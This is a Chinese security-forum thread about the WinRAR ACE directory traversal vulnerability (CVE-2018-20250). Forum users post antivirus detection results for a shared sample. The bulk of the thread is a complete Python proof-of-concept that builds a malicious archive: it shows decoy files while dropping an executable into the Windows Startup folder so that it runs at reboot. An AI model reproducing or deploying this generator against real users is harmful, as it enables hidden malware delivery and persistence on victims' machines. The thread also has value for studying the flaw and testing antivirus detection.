WinRAR目录穿越漏洞

python无名氏

需要低版本的WinRAR预览状态下只有两个文件：rick.txt；roll.txt
且解压后也只有这俩活宝

解压后重启自动弹出计算器

对对对对

事件: 检测到恶意对象
用户: LAPTOP-PCM5IPNM\啊哈
用户类型: 活动用户
应用程序名称: msedge.exe
应用程序路径: C:\Program Files (x86)\Microsoft\Edge\Application
组件: 网页反病毒
结果说明: 检测到
类型: 木马
名称: HEUR:Exploit.Win32.CVE-2018-20250.gen
精确度: 启发式分析
威胁级别: 高
对象类型: 文件
对象名称: forum.php?mod=attachment&aid=MzMxNTI4OHwzMDkwMzgxZHwxNjcxNDM2NjMwfDEyOTAxNDR8MjI0ODc2MQ%3D%3D
对象路径: https://bbs.kafan.cn
MD5: 2A286FCDF0196CBF8CBDC484D485D107
原因: 专家分析
数据库发布日期: ？？？？？？？？？？？？？？？？？？？

(WinRAR穿越漏洞)

心醉咖啡

360

莫求

管家16，压缩包kill

python无名氏

GDATA Kill
Exploit.ACE-PathTraversal.Gen

python无名氏

漏洞POC(python):

1. #!/usr/bin/env python3
   
2. 
   
3. import os
   
4. import re
   
5. import zlib
   
6. import binascii
   
7. import sys
   
8. # 生成的压缩包名
   
9. rar_filename = "test.rar"
   
10. # 穿越的恶意文件
    
11. evil_filename = "calc.exe"
    
12. # 恶意文件释放的目录
    
13. target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
    
14. # Other files to be displayed when the victim opens the winrar
    
15. # filename_list=[]
    
16. filename_list = ["rick.txt", "roll.txt"]
    
17. 
    
18. class AceCRC32:
    
19.     def __init__(self, buf=b''):
    
20.         self.__state = 0
    
21.         if len(buf) > 0:
    
22.             self += buf
    
23. 
    
24.     def __iadd__(self, buf):
    
25.         self.__state = zlib.crc32(buf, self.__state)
    
26.         return self
    
27. 
    
28.     def __eq__(self, other):
    
29.         return self.sum == other
    
30. 
    
31.     def __format__(self, format_spec):
    
32.         return self.sum.__format__(format_spec)
    
33. 
    
34.     def __str__(self):
    
35.         return "0x%08x" % self.sum
    
36. 
    
37.     @property
    
38.     def sum(self):
    
39.         return self.__state ^ 0xFFFFFFFF
    
40. 
    
41. def ace_crc32(buf):
    
42.     return AceCRC32(buf).sum
    
43. 
    
44. def get_ace_crc32(filename):
    
45.     with open(filename, 'rb') as f:
    
46.         return ace_crc32(f.read())
    
47. 
    
48. def get_right_hdr_crc(filename):
    
49.     # This command may be different, it depends on the your Python3 environment.
    
50.     p = os.popen('py -3 acefile.py --headers %s'%(filename))
    
51.     res = p.read()
    
52.     pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    
53.     result = pattern.findall(res)
    
54.     right_hdr_crc = result[0].upper()
    
55.     return hex2raw4(right_hdr_crc)
    
56. 
    
57. def modify_hdr_crc(shellcode, filename):
    
58.     hdr_crc_raw = get_right_hdr_crc(filename)
    
59.     shellcode_new = shellcode.replace("6789", hdr_crc_raw)
    
60.     return shellcode_new
    
61. 
    
62. def hex2raw4(hex_value):
    
63.     while len(hex_value) < 4:
    
64.         hex_value = '0' + hex_value
    
65.     return hex_value[2:] + hex_value[:2]
    
66. 
    
67. def hex2raw8(hex_value):
    
68.     while len(hex_value) < 8:
    
69.         hex_value = '0' + hex_value
    
70.     return hex_value[6:] + hex_value[4:6] + hex_value[2:4] + hex_value[:2]
    
71. 
    
72. def get_file_content(filename):
    
73.     with open(filename, 'rb') as f:
    
74.         return str(binascii.hexlify(f.read()))[2:-1] # [2:-1] to remote b'...'
    
75. 
    
76. def make_shellcode(filename, target_filename):
    
77.     if target_filename == "":
    
78.         target_filename = filename
    
79.     hdr_crc_raw = "6789"
    
80.     hdr_size_raw = hex2raw4(str(hex(len(target_filename)+31))[2:])
    
81.     packsize_raw = hex2raw8(str(hex(os.path.getsize(filename)))[2:])
    
82.     origsize_raw = packsize_raw
    
83.     crc32_raw = hex2raw8(str(hex(get_ace_crc32(filename)))[2:])
    
84.     filename_len_raw = hex2raw4(str(hex(len(target_filename)))[2:])
    
85.     filename_raw = "".join("{:x}".format(ord(c)) for c in target_filename)
    
86.     content_raw = get_file_content(filename)
    
87.     shellcode = hdr_crc_raw + hdr_size_raw + "010180" + packsize_raw \
    
88.               + origsize_raw + "63B0554E20000000" + crc32_raw + "00030A005445"\
    
89.               + filename_len_raw + filename_raw + "01020304050607080910A1A2A3A4A5A6A7A8A9"
    
90.     return shellcode
    
91. 
    
92. def build_file(shellcode, filename):
    
93.     with open(filename, "wb") as f:
    
94.         f.write(binascii.a2b_hex(shellcode.upper()))
    
95. 
    
96. def build_file_add(shellcode, filename):
    
97.     with open(filename, "ab+") as f:
    
98.         f.write(binascii.a2b_hex(shellcode.upper()))
    
99. 
    
100. def build_file_once(filename, target_filename=""):
     
101.     shellcode = make_shellcode(filename, target_filename)
     
102.     build_file_add(shellcode, rar_filename)
     
103.     shellcode_new = modify_hdr_crc(shellcode, rar_filename)
     
104.     content_raw = get_file_content(rar_filename).upper()
     
105.     build_file(content_raw.replace(shellcode.upper(), shellcode_new.upper()).replace("01020304050607080910A1A2A3A4A5A6A7A8A9", get_file_content(filename)), rar_filename)
     
106. 
     
107. if __name__ == '__main__':
     
108.     print("[*] Start to generate the archive file %s..."%(rar_filename))
     
109. 
     
110.     shellcode_head = "6B2831000000902A2A4143452A2A141402001018564E974FF6AA00000000162A554E524547495354455245442056455253494F4E2A"
     
111.     build_file(shellcode_head, rar_filename)
     
112. 
     
113.     for i in range(len(filename_list)):
     
114.         build_file_once(filename_list[i])
     
115. 
     
116.     build_file_once(evil_filename, target_filename)
     
117. 
     
118.     print("[+] Evil archive file %s generated successfully !"%(rar_filename))

复制代码

PianoA

金山毒霸miss，难不成金山当年只对WinRAR做了处理方案？

anthonyqian

ESET  ACE/Exploit.CVE-2018-20250.B

python无名氏

各位也可以解压然后重启试一试纯天然无公害！（完事进shell:startup删掉hi.exe就行）

GDHJDSYDH

MD: Exploit:Win32/CVE-2018-20250.B!dha